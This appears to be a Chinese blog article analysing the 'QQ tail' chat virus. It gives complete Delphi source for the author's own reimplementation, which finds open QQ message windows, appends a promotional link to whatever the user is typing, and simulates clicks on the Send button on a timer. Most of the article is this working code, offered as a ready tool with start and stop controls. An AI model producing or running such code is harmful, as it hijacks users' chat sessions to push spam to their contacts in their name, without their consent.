ＱＱ尾巴病毒的發送原理分析

ＱＱ尾巴病毒的發送原理分析 近來ＱＱ尾巴病毒大肆發作，我也是經常收到網友們發到來的帶尾巴的消息，於是，好奇心一來，我也來研究研究此病毒的發作原理。首先，我不知道ＱＱ尾巴病毒真正的原理，我只是猜測並且自己寫了一個類似的程序來實現它。   ＱＱ尾巴的發作情況：當用戶打開一個ＱＱ消息發送窗口時，病毒會自動往消息文本框裡輸入文本，然後不等用戶反應過來就發出去了。   程序實現：首先要找到ＱＱ消息發送窗口的句柄以及消息文本框與“發送”按鈕的窗口句柄。   一、             如何找到ＱＱ消息發送窗口句柄： ＱＱ消息發送窗口有兩種，一種是消息模式，在這種情況下，窗口標題含有“發送消息”字樣；一種是聊天模式，窗口標題含有“聊天中”字樣； 通過枚舉窗口就可找到相應的句柄： // 取得ＱＱ的發送消息窗口 function GetQQWnd: HWND; var   hCurrentWindow: HWnd;   WndText:String; begin   hCurrentWindow := GetWindow(Application.Handle, GW_HWNDFIRST);   while hCurrentWindow <> 0 do   begin     WndText:=GetWndText(hCurrentWindow);     if (Pos('聊天中',WndText)>0) or (Pos('發送消息',WndText)>0) then     begin       Result:=hCurrentWindow;       Exit;     end;     hCurrentWindow := GetWindow(hCurrentWindow, GW_HWNDNEXT);   end;   Result:=0; end;   二、             如何找到“發送”按鈕窗口句柄： 找到了ＱＱ的發送消息窗口後，就可以進一步查找“發送”按鈕句柄了，如窗口句柄為QQWnd，則可以用一個循環，查找文本中含有“發送”字樣的窗口，經過試驗發現，“發送”按鈕恰恰是窗體的第一個子窗口，這樣，可以用 btnWnd:=GetDlgItem(QQWnd,1);  // 發送按鈕 來獲得“發送”按鈕的句柄。   三、             如何找到消息文本框窗口句柄： 消息文本框並不好找，不過你可以先在消息文本框中輸入幾個字母，如“abcd”，這樣我們就可以用上述方法來查找了，不過通過實驗後，發現消息文本框並不是ＱＱ窗口的直接子窗口，而是其中一個子窗口的子窗口，通過實驗，可以用 txtWnd:=GetWindow(GetDlgItem(QQWnd,0),GW_CHILD);  // 文本框 來獲得。   四、             如何獲得原消息文本框的文本： 要獲取原消息文本框的文本，只需要一個ＡＰＩ函數就行了，如下： // 獲得窗口文本 function GetWndText(hWnd: HWND): String; Var   Ret:LongInt;   mText:PChar;   Buf:Integer; begin   Ret:=SendMessage(hWnd,WM_GETTEXTLENGTH,0,0)+1;   GetMem(mText,Ret);   try     Buf:=LongInt(mText);     SendMessage(hWnd,WM_GETTEXT,Ret,Buf);     Result:=StrPas(mText);   finally     FreeMem(mText,Ret);   end; end;   五、             如何住原消息文本框裡追加文本： 與取文本相反 // 發送文本到窗口 procedure SetWndText(hWnd: HWND; Text: String); Var   Ret:LongInt;   mText:PChar;   Buf:Integer; begin   GetMem(mText,Length(Text));   StrCopy(mText,PChar(Text));   try     Buf:=LongInt(mText);     SendMessage(hWnd,WM_SETTEXT,0,Buf);   finally     FreeMem(mText,Length(Text));   end; end; 六、             如果讓“發送”按鈕自動點擊： 一切都准備好了，現在要開始發送了，為了讓消息自動發送，我們可以模擬“發送”按鈕被點擊了。   SendMessage(btnWnd,WM_LBUTTONDOWN,MK_LBUTTON,0);   SendMessage(btnWnd,WM_LBUTTONUP,0,0); 通過模擬一個鼠標在“開始”按鈕上的按下與放開，就實現了點擊發送功能。   七、             其它的定時功能比較簡單，在此也不多說了。   八、             全部源代碼如下： unit Unit1;   interface   uses   Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,   Dialogs, StdCtrls, ExtCtrls;   type   TForm1 = class(TForm)     Timer1: TTimer;     Button1: TButton;     Edit1: TEdit;     Label1: TLabel;     Button2: TButton;     procedure Timer1Timer(Sender: TObject);     procedure Button1Click(Sender: TObject);     procedure Button2Click(Sender: TObject);   private     { Private declarations }   public     { Public declarations }   end;   var   Form1: TForm1;   implementation   {$R *.dfm}   // 獲得窗口文本 function GetWndText(hWnd: HWND): String; Var   Ret:LongInt;   mText:PChar;   Buf:Integer; begin   Ret:=SendMessage(hWnd,WM_GETTEXTLENGTH,0,0)+1;   GetMem(mText,Ret);   try     Buf:=LongInt(mText);     SendMessage(hWnd,WM_GETTEXT,Ret,Buf);     Result:=StrPas(mText);   finally     FreeMem(mText,Ret);   end; end; // 發送文本到窗口 procedure SetWndText(hWnd: HWND; Text: String); Var   Ret:LongInt;   mText:PChar;   Buf:Integer; begin   GetMem(mText,Length(Text));   StrCopy(mText,PChar(Text));   try     Buf:=LongInt(mText);     SendMessage(hWnd,WM_SETTEXT,0,Buf);   finally     FreeMem(mText,Length(Text));   end; end; // 取得ＱＱ的發送消息窗口 function GetQQWnd: HWND; var   hCurrentWindow: HWnd;   WndText:String; begin   hCurrentWindow := GetWindow(Application.Handle, GW_HWNDFIRST);   while hCurrentWindow <> 0 do   begin     WndText:=GetWndText(hCurrentWindow);     if (Pos('聊天中',WndText)>0) or (Pos('發送消息',WndText)>0) then     begin       Result:=hCurrentWindow;       Exit;     end;     hCurrentWindow := GetWindow(hCurrentWindow, GW_HWNDNEXT);   end;   Result:=0; end; // 定時處理 procedure TimerProc; var   QQWnd,txtWnd,btnWnd:HWND;   Msg:String; begin   qqWnd:=GetQQWnd;   if QQWnd=0 then Exit;     btnWnd:=GetDlgItem(QQWnd,1);  // 發送按鈕   txtWnd:=GetWindow(GetDlgItem(QQWnd,0),GW_CHILD);  // 文本框   if (btnWnd=0) or (txtWnd=0) then Exit;   Msg:=GetWndText(txtWnd);   Msg:=Msg+#13+#10+'歡迎光臨綠蔭網絡http://www.lvyin.Net';   SetWndText(txtWnd,Msg);   SendMessage(btnWnd,WM_LBUTTONDOWN,MK_LBUTTON,0);   SendMessage(btnWnd,WM_LBUTTONUP,0,0); end;   procedure TForm1.Timer1Timer(Sender: TObject); begin   TimerProc; end;   procedure TForm1.Button1Click(Sender: TObject); begin   Timer1.Enabled :=not Timer1.Enabled;   if Timer1.Enabled then     Button1.Caption :='停 止'   else     Button1.Caption :='開 始'; end;   procedure TForm1.Button2Click(Sender: TObject); begin   Timer1.Interval :=StrToInt(Edit1.Text); end;